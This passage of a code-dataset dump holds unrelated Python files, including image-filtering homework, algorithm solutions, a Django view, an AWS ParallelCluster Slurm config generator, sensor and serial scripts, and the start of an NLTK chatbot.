ky+y\n\n if adjx < 0:\n adjx = 0\n elif adjx >= xmax:\n adjx = xmax-1\n\n if adjy < 0:\n adjy = 0\n elif adjy >= ymax:\n adjy = ymax-1\n\n isum = kernel[kx+kxmax][ky+kymax] * im[adjx][adjy]\n conv_sum += isum\n return conv_sum\n\ndef non_max_suppression(im, threshold):\n xmax = im.shape[0]\n ymax = im.shape[1]\n\n suppress = im.copy()\n for x in range(0,xmax):\n for y in range(0, ymax):\n grad = gradient(x, y, im)\n gmag = np.sqrt(grad[0]**2 + grad[1]**2)\n if gmag < threshold:\n suppress[x][y] = 0\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n non_max_suppress_point(x, y, suppress, suppress.copy())\n\n return suppressed\n\ndef non_max_suppress_point(x, y, im, original):\n if im[x][y] == 0:\n return\n xmax = im.shape[0]\n ymax = im.shape[1]\n grad = gradient(x, y, original)\n if grad[0] == 0:\n grad_dir = 1\n grad_dir = np.arctan(grad[1]/grad[0])\n deg = np.degrees(grad_dir)\n\n if abs(deg) > 90:\n deg = -1 * np.sign(deg) * (180 - abs(deg))\n \n if abs(deg) > 85:\n if y+1 >= ymax:\n yt = ymax-1\n yt = y+1\n \n if y == 0:\n yb = 0\n yb = y-1\n\n if original[x][y] < original[x][yt] or original[x][y] < original[x][yb]:\n im[x][y] = 0\n elif abs(deg) > 5:\n if original[x][y] < max_direc(x, y, deg, original):\n im[x][y] = 0\n else:\n if x+1 >= ymax:\n xr = xmax-1\n xr = x+1\n \n if x == 0:\n xl = 0\n xl = x-1\n\n if original[x][y] < original[xr][y] or original[x][y] < original[xl][y]:\n im[x][y] = 0\n\n\ndef max_direc(x, y, deg, im):\n xmax = im.shape[0]\n ymax = im.shape[1]\n if abs(deg) > 67.5:\n if y+1 >= ymax:\n yt = ymax-1\n yt = y+1\n if y==0:\n yb = 0\n yb = y-1\n max1 = im[x][yt]\n max2 = im[x][yb]\n elif abs(deg) > 22.5:\n if deg<0:\n if x+1 >= xmax:\n xn1 = xmax - 1\n xn1 = x+1\n if y == 0:\n yn1 = 0\n yn1 = y-1\n if x == 0:\n xn2 = 0\n xn2 = x-1\n if y+1 >= ymax:\n yn2 = ymax-1\n yn2 = y+1\n else:\n if x+1 >= xmax:\n xn2 = xmax - 1\n xn2 = x+1\n if y == 0:\n yn1 = 0\n yn1 = y-1\n if x == 0:\n xn1 = 0\n xn1 = x-1\n if y+1 >= ymax:\n yn2 = ymax-1\n yn2 = y+1\n max1 = im[xn1][yn1]\n max2 = im[xn2][yn2]\n else:\n if x+1 >= xmax:\n xr = xmax-1\n xr = x+1\n if x == 0:\n xl = 0\n xl = x-1\n\n max1 = im[xr][y]\n max2 = im[xl][y]\n\n return max(max1, max2)\n \n\ndef gradient(x, y, im):\n dfx = myfilter('sobel_x', im, 2, threshold)\n dfy = myfilter('sobel_y', im, 2, threshold)\n return np.array([dfx, 
dfy])\n\n\n#################################\n# Gaussian Filtering of images. #\n#################################\n\nR = mpimg.imread('red.png', 0)\nR_gauss2 = myfilter('gaussian', R, 2, 0)\n\nR_gauss5 = myfilter('gaussian', R, 5, 0)\n\n\n########################################\n# Compute Gradients with Sobel Filter. #\n########################################\n\nR_sobel_x = myfilter('sobel-x', R, 0, 250)\nR_sobel_y = myfilter('sobel-y', R, 0, 250)\n\n\n####################################\n# Perform Non-Maximum Suppression. #\n####################################\n\nR_nonmax = non_max_suppression(R, 100)\nR_plot = plt.imshow(R_nonmax)\nplt.show()\n","sub_path":"CS558/Assignments/Assignments/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521639267","text":"#  特别hardeeee\nclass Solution(object):\n def diffWaysToCompute(self, input):\n \"\"\"\n :type input: str\n :rtype: List[int]\n \"\"\"\n output = []\n for i in range(len(input)):\n c = input[i]\n # Since there would always be like 2 - 3 * 3 one operator split each other\n # Enter bt while operator\n if c == '+' or c == '-' or c == '*':\n for a in self.diffWaysToCompute(input[:i]):\n for b in self.diffWaysToCompute(input[i+1:]):\n\n output.append(a + b if c == '+' else(a - b if c == '-' else a * b))\n if not output:\n output.append(int(input))\n return output\n\ns = Solution()\ns.diffWaysToCompute('2*3-4*5')","sub_path":"backtrack/241 different-ways-to-add-parentheses.py","file_name":"241 different-ways-to-add-parentheses.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423638401","text":"from django.views.generic.detail import SingleObjectMixin\n\nfrom database.models import Collection\nfrom database.models import CollectionDevice\n\nfrom irekua_utils.permissions.data_collections import (\n devices as devices_permissions)\nfrom irekua_utils.permissions.data_collections import (\n users as user_permissions)\nfrom irekua_utils.permissions import (\n licences as licence_permissions)\nfrom selia.views.list_views.base import SeliaListView\nfrom irekua_utils.filters.data_collections import collection_devices\n\n\nclass ListCollectionDevicesView(SeliaListView, SingleObjectMixin):\n template_name = 'selia/list/collection_devices.html'\n list_item_template = 'selia/components/list_items/collection_device.html'\n help_template = 'selia/components/help/collection_devices.html'\n filter_form_template = 'selia/components/filters/collection_device.html'\n\n filter_class = collection_devices.Filter\n search_fields = collection_devices.search_fields\n ordering_fields = collection_devices.ordering_fields\n\n def has_create_permission(self):\n user = self.request.user\n return devices_permissions.create(user, collection=self.object)\n\n def get_permissions(self):\n permissions = super().get_permissions()\n user = self.request.user\n permissions['list_collection_users'] = user_permissions.list(\n user, collection=self.object)\n permissions['list_collection_licences'] = licence_permissions.list(\n user, collection=self.object)\n return permissions\n\n def get(self, request, *args, **kwargs):\n self.object = self.get_object(queryset=Collection.objects.all())\n return super().get(request, *args, **kwargs)\n\n def get_initial_queryset(self):\n return CollectionDevice.objects.filter(collection=self.object)\n\n def 
get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['collection'] = self.object\n return context\n","sub_path":"irekua/selia/views/list_views/collection_devices.py","file_name":"collection_devices.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"66887787","text":"# Python 2.7.15\n# 19/04/11\n# 문제3. 동명이인 찾기\n\ndef findSameName(lst):\n s = set()\n for i in range(len(lst)-1):\n tmp = lst[i+1:]\n if lst[i] in tmp:\n s.add(lst[i])\n return s\n#end findSameName\n","sub_path":"python/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"629455646","text":"# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"LICENSE.txt\" file accompanying this file.\n# This file is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.\n# See the License for the specific language governing permissions and limitations under the License.\nimport argparse\nimport json\nimport logging\nimport re\nfrom os import makedirs, path\nfrom socket import gethostname\n\nimport requests\nimport yaml\nfrom jinja2 import Environment, FileSystemLoader\n\nlog = logging.getLogger()\ninstance_types_data = {}\n\n\nclass CriticalError(Exception):\n \"\"\"Critical error for the daemon.\"\"\"\n\n pass\n\n\ndef generate_slurm_config_files(\n output_directory, template_directory, input_file, instance_types_data_path, dryrun, no_gpu\n):\n \"\"\"\n Generate Slurm configuration files.\n\n For each queue, generate slurm_parallelcluster_{QueueName}_partitions.conf\n and slurm_parallelcluster_{QueueName}_gres.conf, which contain node info.\n\n Generate slurm_parallelcluster.conf and slurm_parallelcluster_gres.conf,\n which includes queue specifc configuration files.\n\n slurm_parallelcluster.conf is included in main slurm.conf\n and slurm_parallelcluster_gres.conf is included in gres.conf.\n \"\"\"\n # Make output directories\n output_directory = path.abspath(output_directory)\n pcluster_subdirectory = path.join(output_directory, \"pcluster\")\n makedirs(pcluster_subdirectory, exist_ok=True)\n env = _get_jinja_env(template_directory)\n\n cluster_config = _load_cluster_config(input_file)\n head_node_config = _get_head_node_config()\n queues = cluster_config[\"Scheduling\"][\"SlurmQueues\"]\n\n global instance_types_data\n with open(instance_types_data_path) as input_file:\n instance_types_data = json.load(input_file)\n\n # Generate slurm_parallelcluster_{QueueName}_partitions.conf and slurm_parallelcluster_{QueueName}_gres.conf\n is_default_queue = True # The first queue in the queues list is the default queue\n for queue in queues:\n for file_type in [\"partition\", \"gres\"]:\n _generate_queue_config(\n queue[\"Name\"], queue, is_default_queue, file_type, env, pcluster_subdirectory, dryrun, no_gpu=no_gpu\n )\n is_default_queue = False\n\n # Generate slurm_parallelcluster.conf and slurm_parallelcluster_gres.conf\n for template_name in [\"slurm_parallelcluster.conf\", \"slurm_parallelcluster_gres.conf\"]:\n _generate_slurm_parallelcluster_configs(\n queues,\n head_node_config,\n 
cluster_config[\"Scheduling\"][\"SlurmSettings\"],\n template_name,\n env,\n output_directory,\n dryrun,\n )\n\n generate_instance_type_mapping_file(pcluster_subdirectory, queues)\n\n log.info(\"Finished.\")\n\n\ndef _load_cluster_config(input_file_path):\n \"\"\"\n Load queues_info and add information used to render templates.\n\n :return: queues_info containing id for first queue, head_node_hostname and queue_name\n \"\"\"\n with open(input_file_path) as input_file:\n return yaml.load(input_file, Loader=yaml.SafeLoader)\n\n\ndef _get_head_node_config():\n return {\n \"head_node_hostname\": gethostname(),\n \"head_node_ip\": _get_head_node_private_ip(),\n }\n\n\ndef _get_head_node_private_ip():\n \"\"\"Get head node private ip from EC2 metadata.\"\"\"\n return _get_metadata(\"local-ipv4\")\n\n\ndef _generate_queue_config(\n queue_name, queue_config, is_default_queue, file_type, jinja_env, output_dir, dryrun, no_gpu=False\n):\n log.info(\"Generating slurm_parallelcluster_%s_%s.conf\", queue_name, file_type)\n rendered_template = jinja_env.get_template(f\"slurm_parallelcluster_queue_{file_type}.conf\").render(\n queue_name=queue_name, queue_config=queue_config, is_default_queue=is_default_queue, no_gpu=no_gpu\n )\n if not dryrun:\n filename = path.join(output_dir, f\"slurm_parallelcluster_{queue_name}_{file_type}.conf\")\n if file_type == \"gres\" and no_gpu:\n _write_rendered_template_to_file(\n \"# This file is automatically generated by pcluster\\n\"\n \"# Skipping GPUs configuration because Nvidia driver is not installed\",\n filename,\n )\n else:\n _write_rendered_template_to_file(rendered_template, filename)\n\n\ndef _generate_slurm_parallelcluster_configs(\n queues, head_node_config, scaling_config, template_name, jinja_env, output_dir, dryrun\n):\n log.info(\"Generating %s\", template_name)\n rendered_template = jinja_env.get_template(f\"{template_name}\").render(\n queues=queues,\n head_node_config=head_node_config,\n scaling_config=scaling_config,\n output_dir=output_dir,\n )\n if not dryrun:\n filename = f\"{output_dir}/{template_name}\"\n _write_rendered_template_to_file(rendered_template, filename)\n\n\ndef _get_jinja_env(template_directory):\n \"\"\"Return jinja environment with trim_blocks/lstrip_blocks set to True.\"\"\"\n file_loader = FileSystemLoader(template_directory)\n # A nosec comment is appended to the following line in order to disable the B701 check.\n # The contents of the default templates are known and the input configuration data is\n # validated by the CLI.\n env = Environment(loader=file_loader, trim_blocks=True, lstrip_blocks=True) # nosec nosemgrep\n env.filters[\"sanify_name\"] = lambda value: re.sub(r\"[^A-Za-z0-9]\", \"\", value)\n env.filters[\"gpus\"] = _gpu_count\n env.filters[\"gpu_type\"] = _gpu_type\n env.filters[\"vcpus\"] = _vcpus\n\n return env\n\n\ndef _gpu_count(instance_type):\n \"\"\"Return the number of GPUs for the instance.\"\"\"\n gpu_info = instance_types_data[instance_type].get(\"GpuInfo\", None)\n\n gpu_count = 0\n if gpu_info:\n for gpus in gpu_info.get(\"Gpus\", []):\n gpu_manufacturer = gpus.get(\"Manufacturer\", \"\")\n if gpu_manufacturer.upper() == \"NVIDIA\":\n gpu_count += gpus.get(\"Count\", 0)\n else:\n log.info(\n f\"ParallelCluster currently does not offer native support for '{gpu_manufacturer}' GPUs. 
\"\n \"Please make sure to use a custom AMI with the appropriate drivers in order to leverage \"\n \"GPUs functionalities\"\n )\n\n return gpu_count\n\n\ndef _gpu_type(instance_type):\n \"\"\"Return name or type of the GPU for the instance.\"\"\"\n gpu_info = instance_types_data[instance_type].get(\"GpuInfo\", None)\n # Remove space and change to all lowercase for name\n return \"no_gpu_type\" if not gpu_info else gpu_info.get(\"Gpus\")[0].get(\"Name\").replace(\" \", \"\").lower()\n\n\ndef _vcpus(compute_resource) -> int:\n \"\"\"Get the number of vcpus for the instance according to disable_hyperthreading and instance features.\"\"\"\n instance_type = compute_resource[\"InstanceType\"]\n disable_simultaneous_multithreading = compute_resource[\"DisableSimultaneousMultithreading\"]\n instance_type_info = instance_types_data[instance_type]\n vcpus_info = instance_type_info.get(\"VCpuInfo\", {})\n vcpus_count = vcpus_info.get(\"DefaultVCpus\")\n threads_per_core = vcpus_info.get(\"DefaultThreadsPerCore\")\n if threads_per_core is None:\n supported_architectures = instance_type_info.get(\"ProcessorInfo\", {}).get(\"SupportedArchitectures\", [])\n threads_per_core = 2 if \"x86_64\" in supported_architectures else 1\n return vcpus_count if not disable_simultaneous_multithreading else (vcpus_count // threads_per_core)\n\n\ndef _write_rendered_template_to_file(rendered_template, filename):\n log.info(\"Writing contents of %s\", filename)\n with open(filename, \"w\") as output_file:\n output_file.write(rendered_template)\n\n\ndef _setup_logger():\n logging.basicConfig(\n level=logging.INFO, format=\"%(asctime)s - [%(name)s:%(funcName)s] - %(levelname)s - %(message)s\"\n )\n\n\ndef generate_instance_type_mapping_file(output_dir, queues):\n \"\"\"Generate a mapping file to retrieve the Instance Type related to the instance key used in the slurm nodename.\"\"\"\n instance_name_type_mapping = {}\n for queue in queues:\n instance_name_type_mapping[queue[\"Name\"]] = {}\n compute_resources = queue[\"ComputeResources\"]\n hostname_regex = re.compile(\"[^A-Za-z0-9]\")\n for compute_resource in compute_resources:\n instance_type = compute_resource.get(\"InstanceType\")\n # Remove all characters excepts letters and numbers\n sanitized_compute_name = re.sub(hostname_regex, \"\", compute_resource.get(\"Name\"))\n instance_name_type_mapping[queue[\"Name\"]][sanitized_compute_name] = instance_type\n\n filename = f\"{output_dir}/instance_name_type_mappings.json\"\n log.info(\"Generating %s\", filename)\n with open(filename, \"w\") as output_file:\n output_file.write(json.dumps(instance_name_type_mapping, indent=4))\n\n\ndef _get_metadata(metadata_path):\n \"\"\"\n Get EC2 instance metadata.\n\n :param metadata_path: the metadata relative path\n :return the metadata value.\n \"\"\"\n try:\n token = requests.put(\n \"http://169.254.169.254/latest/api/token\", headers={\"X-aws-ec2-metadata-token-ttl-seconds\": \"300\"}\n )\n headers = {}\n if token.status_code == requests.codes.ok:\n headers[\"X-aws-ec2-metadata-token\"] = token.content\n metadata_url = \"http://169.254.169.254/latest/meta-data/{0}\".format(metadata_path)\n metadata_value = requests.get(metadata_url, headers=headers).text\n except Exception as e:\n error_msg = \"Unable to get {0} metadata. 
Failed with exception: {1}\".format(metadata_path, e)\n log.critical(error_msg)\n raise CriticalError(error_msg)\n\n log.debug(\"%s=%s\", metadata_path, metadata_value)\n return metadata_value\n\n\ndef main():\n try:\n _setup_logger()\n log.info(\"Running ParallelCluster Slurm Config Generator\")\n parser = argparse.ArgumentParser(description=\"Take in slurm configuration generator related parameters\")\n parser.add_argument(\n \"--output-directory\", type=str, help=\"The output directory for generated slurm configs\", required=True\n )\n parser.add_argument(\n \"--template-directory\", type=str, help=\"The directory storing slurm config templates\", required=True\n )\n parser.add_argument(\n \"--input-file\",\n type=str,\n # Todo: is the default necessary?\n default=\"/opt/parallelcluster/slurm_config.json\",\n help=\"Yaml file containing pcluster configuration file\",\n )\n parser.add_argument(\n \"--instance-types-data\",\n type=str,\n help=\"JSON file containing info about instance types\",\n )\n parser.add_argument(\n \"--dryrun\",\n action=\"store_true\",\n help=\"dryrun\",\n required=False,\n default=False,\n )\n parser.add_argument(\n \"--no-gpu\",\n action=\"store_true\",\n help=\"no gpu configuration\",\n required=False,\n default=False,\n )\n args = parser.parse_args()\n generate_slurm_config_files(\n args.output_directory,\n args.template_directory,\n args.input_file,\n args.instance_types_data,\n args.dryrun,\n args.no_gpu,\n )\n except Exception as e:\n log.exception(\"Failed to generate slurm configurations, exception: %s\", e)\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cookbooks/aws-parallelcluster-config/files/default/head_node_slurm/slurm/pcluster_slurm_config_generator.py","file_name":"pcluster_slurm_config_generator.py","file_ext":"py","file_size_in_byte":11785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"620828911","text":"import sys\nimport time\nimport atexit\nfrom Phidget22.Devices.DistanceSensor import *\nfrom Phidget22.PhidgetException import *\nfrom Phidget22.Phidget import *\nfrom Phidget22.Net import *\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor\n\n\nDISTANCE = 0.\n\n\ntry:\n ch = DistanceSensor()\nexcept RuntimeError as e:\n print(\"Runtime Exception %s\" % e.details)\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n\n\ndef DistanceSensorAttached(self):\n try:\n attached = self\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n\n\ndef DistanceSensorDetached(self):\n detached = self\n try:\n print(\"\\nDetach event on Port %d Channel %d\" %\n (detached.getHubPort(), detached.getChannel()))\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n\n\ndef ErrorEvent(self, eCode, description):\n print(\"Error %i : %s\" % (eCode, description))\n\n\ndef DistanceChangeHandler(self, distance):\n DISTANCE = distance\n print(DISTANCE)\n\n\ndef initSensor():\n try:\n ch.setOnAttachHandler(DistanceSensorAttached)\n ch.setOnDetachHandler(DistanceSensorDetached)\n ch.setOnErrorHandler(ErrorEvent)\n ch.setOnDistanceChangeHandler(DistanceChangeHandler)\n\n print(\"Waiting for the Phidget DistanceSensor Object to be attached...\")\n ch.openWaitForAttachment(5000)\n except PhidgetException as e:\n print(\"Phidget 
Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n return ch\n\n\ndef getDistance():\n return DISTANCE\n\n\ndef sensorClose():\n try:\n ch.close()\n except PhidgetException as e:\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\n print(\"Press Enter to Exit...\\n\")\n readin = sys.stdin.read(1)\n exit(1)\n print(\"Closed DistanceSensor device\")\n exit(0)\n\n# 무조건 같은 폴더안에 phidget22 ~ 있어야함!\n\n","sub_path":"라즈베리파이/Tracking/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591997222","text":"#-*- coding: utf-8 -*-\n\"\"\"\nhttps://yahoo-procon2019-qual.contest.atcoder.jp/tasks/yahoo_procon2019_qual_a\n\"\"\"\n\nfrom collections import defaultdict\ndp = defaultdict(int)\ndef rec(l, k, bis, y, a, b):\n print(l, k, bis, y, a, b)\n if (l, bis, y) in dp:\n print(\"hit, dp size %s\" % len(dp))\n return dp[(l, bis, y)]\n if l == k+1:\n dp[(l, bis, y)] = bis\n return bis\n else:\n\n if y > 0: ret = rec(l+1, k, bis+b, y-1, a, b)\n elif bis >= a: ret = rec(l+1, k, bis-a, y+1, a, b)\n else: ret = rec(l+1, k, bis+1, y, a, b)\n dp[(l, bis, y)] = ret\n return dp[(l, bis, y)]\n\ndef sol_botsu(k, a, b):\n # global dp\n # dp = defaultdict(int)\n # return rec(1, k, 1, 0, a, b)\n bis = 1\n y = 0\n for i in range(k):\n if y > 0: bis+=b; y-=1\n elif bis >= a: bis-=a; y+=1\n else: bis+=1\n return bis\n\ndef sol_botsu2(k, a, b):\n bis = 1\n y = 0\n i = 0\n while k > 0:\n print(k, bis, y)\n rest = a - (bis % a)\n if k - (rest) >= 2:\n print(\"saving\")\n k-=(rest); y+=1; bis-=(bis % a); k-=1;\n elif y > 0:\n print(\"payoff\")\n k -= 1; bis = (y*b); y = 0;\n else:\n print(\"normal\")\n if k > a:\n k-=a; bis += a\n else:\n bis += k; k = 0\n i+=1\n #if i == 20: break\n return bis\n\n\ndef sol_botsu3(k, a, b): # なぜに!?\n print(k, a, b)\n bis = 1\n bank = 0\n y = 0\n i = 1\n while k > 0:\n print(\"status:i:%s, k:%s, bis:%s y:%s, bank:%s\" % (i, k, bis, y, bank))\n need = a - (bis % a)\n if k - (need) >= 2:\n print(\"saving\")\n k-=(need); bis+=need\n elif k -1 >=1 and bis >= a:\n print(\"buying yen\")\n x = (bis/a)\n k-=1; y+=x; bis-=(a*x);\n elif y > 0:\n print(\"pay off\")\n k-=1; bank += y*b; y = 0\n else:\n #print(\"unexpected\")\n print(\"finishing\")\n bis += k; k=0;\n #k-=1; bis+=1;\n i+=1\n return bank + bis\n\n\ndef sol_botsu4(k, a, b):\n print(k, a, b)\n bis = 1\n bank = 0\n y = 0\n i = 1\n while k > 0:\n print(\"status:i:%s, k:%s, bis:%s y:%s, bank:%s\" % (i, k, bis, y, bank))\n need = a - (bis % a)\n if y == 1:\n #print(\"Y -> bis\")\n k-=1; bank += y*b; y = 0\n elif y == 1:\n #print(\"Y -> bis(unexpected)\")\n k-=1; bank += y*b; y = 0\n elif k -1 >=1 and bis >= a:\n x = (bis/a)\n #print(\"bis -> Y(buying %s Y by bis:%s\" % (x, bis))\n k-=1; y+=x; bis-=(a*x);\n elif k - (need) >= 2:\n #print(\"progress %s to increase bis\" % need)\n k-=(need); bis+=need\n else:\n #print(\"kotsukotsu\")\n k-=1; bis+=1\n\n\n\n i+=1\n return bank + bis\n\n\n\ndef sol(k, a, b):\n bis = 1\n if 1+k < a:\n return k+1\n else:\n bis += int((k-1)/2) * (b-a)\n if k % 2 == 1:\n bis += 1\n return bis\n\n\n\nimport sys\nsys.setrecursionlimit(314159265)\ntest = False\ntest = True\nif test:\n # n, k = 5, 5\n S =list( map(int, \"4 2 6\".split()))\n k, a, b = S\n print(sol(k, a, b))\n\n S =list( map(int, \"7 3 4\".split()))\n k, a, b = S\n print(sol(k, a, b))\n\n S =list( map(int, \"314159265 35897932 384626433\".split()))\n # 
48518828981938099\n k, a, b = S\n print(sol(k, a, b))\n\n\nelse:\n #n, k = map(int, input().split())\n S =list( map(int, input().split()))\n k, a, b = S\n print(sol(k, a, b))\n\n\n","sub_path":"atc/abc_118_c_xxx.py","file_name":"abc_118_c_xxx.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"365609885","text":"class TreeNode(object):\n\n def __init__(self, start, end):\n self.val = 0\n self.start = start\n self.end = end\n self.left = None\n self.right = None\n\n\nclass SegementTree(object):\n\n def buildSegementTree(self, nums, left, right):\n if left == right:\n node = TreeNode(left, right)\n node.val = nums[left]\n return node\n else:\n mid = (left + right) // 2\n node = TreeNode(left, right)\n node.left = self.buildSegementTree(nums, left, mid)\n node.right = self.buildSegementTree(nums, mid + 1, right)\n node.val = node.left.val + node.right.val\n\n return node\n\n def __init__(self, nums):\n if nums:\n self.treeRoot = self.buildSegementTree(nums, 0, len(nums) - 1)\n else:\n self.treeRoot = None\n\n def findRangeSum(self, root, begin, end):\n if not root or root.start > begin or root.end < end:\n return 0\n\n if root.start == begin and root.end == end:\n return root.val\n\n mid = (root.start + root.end) // 2\n if end <= mid:\n return self.findRangeSum(root.left, begin, end)\n if begin > mid:\n return self.findRangeSum(root.right, begin, end)\n\n return self.findRangeSum(root.left, begin, mid) + self.findRangeSum(root.right, mid + 1, end)\n","sub_path":"CCI/2/segmentTree.py","file_name":"segmentTree.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393330575","text":"#type: ignore\n\"\"\"Test preprocess.py.\"\"\"\nfrom .preprocess import concatenate\n\ndef test_concatenate_when_dest_exists(files_abc, tmp_path):\n \"\"\"There must be an HTML comment between each file section in the\n destination file.\n\n Assume destination file exists.\n \"\"\"\n dest, *sources = files_abc\n sources[0].write_text(\"B\")\n sources[1].write_text(\"C\")\n\n concatenate(dest, *sources, basedir=tmp_path)\n content = dest.read_text()\n template = \"\"\"\"\"\"\n\n assert template.format(str(sources[0].relative_to(tmp_path))) in content\n assert template.format(str(sources[1].relative_to(tmp_path))) in content\n\ndef test_concatenate_when_dest_does_not_exist(tmp_path):\n \"\"\"preprocess.concatenate must work even if the destination file\n does not exist.\n \"\"\"\n dest = tmp_path/\"dest.md\"\n source_a = tmp_path/\"a.md\"\n source_b = tmp_path/\"b.md\"\n source_a.write_text(\"A\")\n source_b.write_text(\"B\")\n assert not dest.exists()\n\n concatenate(dest, source_a, source_b, basedir=tmp_path)\n content = dest.read_text()\n template = \"\"\"\"\"\"\n\n assert template.format(str(source_a.relative_to(tmp_path))) in content\n assert template.format(str(source_b.relative_to(tmp_path))) in content\n\ndef test_concatenate_when_there_are_no_sources(tmp_path):\n \"\"\"preprocess.concatenate must create an empty file.\"\"\"\n dest = tmp_path/\"dest.md\"\n dest.write_text(\"Delete this.\")\n concatenate(dest, basedir=tmp_path)\n\n content = dest.read_text()\n assert not content\n","sub_path":"cli/slipbox/test_preprocess.py","file_name":"test_preprocess.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
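The `SegementTree` record above answers range-sum queries by caching each node's sum and splitting queries at the node midpoint. A minimal usage sketch (class and method names are taken from that record as-is, misspelling included; the input list is invented for illustration):

nums = [2, 7, 1, 8, 2, 8]
tree = SegementTree(nums)    # builds nodes over index range 0..5
root = tree.treeRoot

# A query that exactly matches a node returns its cached sum directly.
print(tree.findRangeSum(root, 0, 5))   # 28, the sum of the whole array

# Other queries split at mid and combine the left and right halves.
print(tree.findRangeSum(root, 1, 3))   # 16, i.e. 7 + 1 + 8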
+{"seq_id":"71305359","text":"from DragBox import DragBox\nfrom DropArea import DropArea\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\n\n\nclass TestWindow(Gtk.Window):\n def __init__(self):\n super(TestWindow, self).__init__(title=\"TestWindow\")\n self.drop_area = DropArea()\n self.drop_area.set_size(450, 450)\n self.drop_area.set_size_request(450, 450)\n self.drop_area.override_background_color(Gtk.StateType.NORMAL, Gdk.RGBA(0, 0.3, 0.5, 1))\n\n self.fixed = Gtk.Fixed()\n self.fixed.put(self.drop_area, 100, 100)\n self.add(self.fixed)\n\n drag_box = DragBox()\n drag_box.set_size_request(200, 200)\n drag_box.override_background_color(Gtk.StateType.NORMAL, Gdk.RGBA(1, 0, 0.5))\n self.drop_area.add_drag_box(drag_box, 100, 20)\n\ntest_window = TestWindow()\ntest_window.set_size_request(640, 640)\ntest_window.connect('delete-event', Gtk.main_quit)\ntest_window.show_all()\nGtk.main()","sub_path":"test/testDropArea.py","file_name":"testDropArea.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293507288","text":"import serial\nimport time\n\nser = serial.Serial('COM13', 9600, timeout=0)\n\nprint(\"1=on or 2=off\")\nwhile 1:\n\n var = str.encode(input())\n ser.write(var)\n time.sleep(0.1)\n print(ser.readline().decode(\"utf-8\"))","sub_path":"python/bluetooth-testing/basic-tests.py","file_name":"basic-tests.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"364665199","text":"\n#import necessary libraries\nfrom flask import Flask, render_template, request\nfrom datetime import datetime\n#from chatterbot import ChatBot\n#from chatterbot.trainers import ListTrainer\nimport os\nimport io\nimport random\nimport string # to process standard python strings\nimport warnings\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport warnings\nwarnings.filterwarnings('ignore')\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nnltk.download('popular', quiet=True) # for downloading packages\n\n# uncomment the following only the first time\n# nltk.download('punkt')\n# nltk.download('wordnet')\n\n#Reading in the corpus\nwith open('chatbot.txt','r', encoding='utf8', errors ='ignore') as fin:\n raw = fin.read()\n#TOkenisation\nsent_tokens = nltk.sent_tokenize(raw)# converts to list of sentences \nword_tokens = nltk.word_tokenize(raw)# converts to list of words\n\n# Preprocessing\nlemmer = WordNetLemmatizer()\ndef LemTokens(tokens):\n return [lemmer.lemmatize(token) for token in tokens]\nremove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)\ndef LemNormalize(text):\n return LemTokens(nltk.word_tokenize(text.lower().translate(remove_punct_dict)))\n\n\n# Keyword Matching\nGREETING_INPUTS = [\"hello\", \"hi\", \"greetings\", \"sup\", \"whats up\", \"hey\", \"heyy\", \"heyyy\", \"hello there\", \"how are you\", \"how r u\", \"namaste\", \"good morning\", \"good afternoon\", \"good evening\", \"yo\", \"kaisanba\"]\nGREETING_RESPONSES = [\"hi\", \"hey\", \"hi there\", \"hello\", \"I am glad! You are talking to me\", \"It's nice to meet you.\", \"It's a pleasure to meet you.\", \"It's great seeing you. 
